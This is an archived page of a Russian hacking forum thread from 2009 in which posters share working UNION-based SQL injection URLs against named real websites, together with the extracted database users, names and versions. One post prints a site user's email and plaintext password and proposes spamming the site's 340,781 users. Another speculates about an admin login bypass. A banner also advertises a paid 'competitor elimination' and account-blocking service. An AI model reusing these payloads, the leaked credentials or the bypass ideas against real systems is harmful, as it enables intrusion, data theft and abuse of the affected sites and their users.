УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 963 из 1242

963

Опции темы

Поиск в этой теме

Опции просмотра

#9621

02.06.2009, 14:43

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Код:

http://www.thechimneypot.com/gallery.php?category_id=17&hall_of_fame=&project_id=-336+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6--

thechim2_tcpcom@localhost:thechim2_chimneycom:5.0. 77-community

#9622

02.06.2009, 15:16

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

<<Lobzik>>

Код:

http://www.lobzik.pri.ee/modules/wfsection/article.php?articleid=-80+union+select+1,2,3,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--+

5.0.41:*:lobzik:*:lobzik@localhost:*:trustix-linux-gnu

#9623

02.06.2009, 15:26

satana8920

Moderator - Level 7

Регистрация: 22.09.2006

Сообщений: 531

Провел на форуме:
3818187

Репутация: 369

Отправить сообщение для satana8920 с помощью ICQ

http://www.madstorage.com/blog.php?id=-720+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20--

Database Version: 4.1.22-log
Database name: massiveattack
User name: massdbus@vlonj200w2.emihosting.com

#9624

02.06.2009, 16:15

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

http://iep.univ-lille2.fr/enseignants/prof.php?numens=-511+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11
4.0.24_debian-10sarge2-log:web@localhost

rofesseurs

http://www.klanien-male.net/annuaire/prof.php?id=-9+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11
4.0.27-MaxLog:dbo149594951@21

#9625

02.06.2009, 16:39

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

lumelco.es
PR 3

Код:

http://www.lumelco.es/sat.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7

web@localhost:lumelco:4.1.11-standard-log

Последний раз редактировалось mailbrush; 02.06.2009 в 16:39.. Причина: упс, одна боян была

#9626

02.06.2009, 17:17

bug1z

Познающий

Регистрация: 07.05.2009

Сообщений: 64

Провел на форуме:
418218

Репутация: 59

Код:

http://www.goldcoastoceanfest.co.uk/news.php?id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+

Код:

web27-gc@79.170.40.171 : web27-gc : 5.0.77-community

паролей в бд нету
админка:
http://www.goldcoastoceanfest.co.uk/admin

В админке походу пасс прописан в самом скрипте, и почемуто мне кажится что она не надёжна...

так как при неправильном вводе пароля меня перекидывает на скрипт login.php с помощью header() и чутьё мне подсказывает что полле него не указан exit() или die()
таким образом мы можем послать составленый с помощю инеткряка GET или POST запрос дабы попасть в админку без авторизации...

Последний раз редактировалось bug1z; 02.06.2009 в 17:20..

#9627

02.06.2009, 19:00

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

PR 3
http://www.russ-express.de/stranica.php?sopen=Autogas&file=print&sid=-22+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6
5.0.45:web25@localhost:usr_web25_1

#9628

02.06.2009, 19:17

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

Ловите ПР8
http://www.internationalscholarships.com/links.php?c=-Alumni_Services'+union+select+1,concat(name,char(5 8),pass)+from+users+limit+0,1+/*+

Jennifer M Miller ::jmiller@internationalscholarships.com:: h3r3andnow*
Админка
http://www.internationalscholarships.com/admin/

Юзверей 340781 total, можно проспамить их в админке))

Последний раз редактировалось DezMond™; 02.06.2009 в 19:20..

#9629

02.06.2009, 19:24

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

http://www.management.cg.yu/stranica.php?strana=-13+union+select+1,unhex(hex(concat_ws(0x3a,version (),user(),databas

e()))),3,4
4.1.12:management@localhost:management_cg_yu_-_management

http://www.postdiploma.cg.yu/stranica.php?strana=-13+union+select+1,2,3,unhex(hex(concat_ws(0x3a,ver sion(),user(),da

tabase())))
4.1.12

ostdiploma@localhost

ostdiploma_cg_yu_-_postdiploma

#9630

02.06.2009, 23:21

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

http://mton.ru/programms/?content=browse&id=4+union+select+1,2,3,4,concat_w s(0x3a,user(),database(),version())--

mton@localhost:video:4.1.25

Страница 963 из 1242

963

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход